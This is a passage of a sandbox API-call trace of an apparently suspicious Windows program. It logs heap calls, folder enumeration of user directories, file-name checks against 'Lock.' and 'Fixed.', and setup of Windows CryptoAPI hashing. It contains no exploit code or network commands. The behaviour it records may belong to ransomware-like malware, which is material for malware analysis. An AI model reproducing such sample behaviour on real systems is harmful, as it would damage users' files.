hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0223.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0223.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.177] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0223.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0223.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.179] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0223.179] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0223.179] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.180] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0223.180] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0223.180] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x8cf1b0, dwReserved1=0x418f3e, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1eb8 [0223.181] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0223.182] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.182] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.182] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.182] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.208] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0223.208] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0223.208] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0223.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0223.208] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.208] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0223.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0223.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0223.209] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bef0) returned 1 [0223.209] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0223.209] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0223.209] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.210] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.210] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0223.210] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0223.210] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.210] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.210] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.210] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.210] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.210] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.210] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.210] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.210] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.210] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabb00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0223.210] CryptCreateHash (in: hProv=0xa7bef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0223.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.210] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0223.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.211] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.211] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0223.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabb90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0223.211] CryptHashData (hHash=0x9e2238, pbData=0x2a71cc8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0223.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc80 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0223.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0223.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0223.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0223.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0223.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0223.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.212] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aabc68 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.212] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0223.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0223.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.213] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0223.213] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0223.213] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0223.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0223.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0223.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabaa0 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 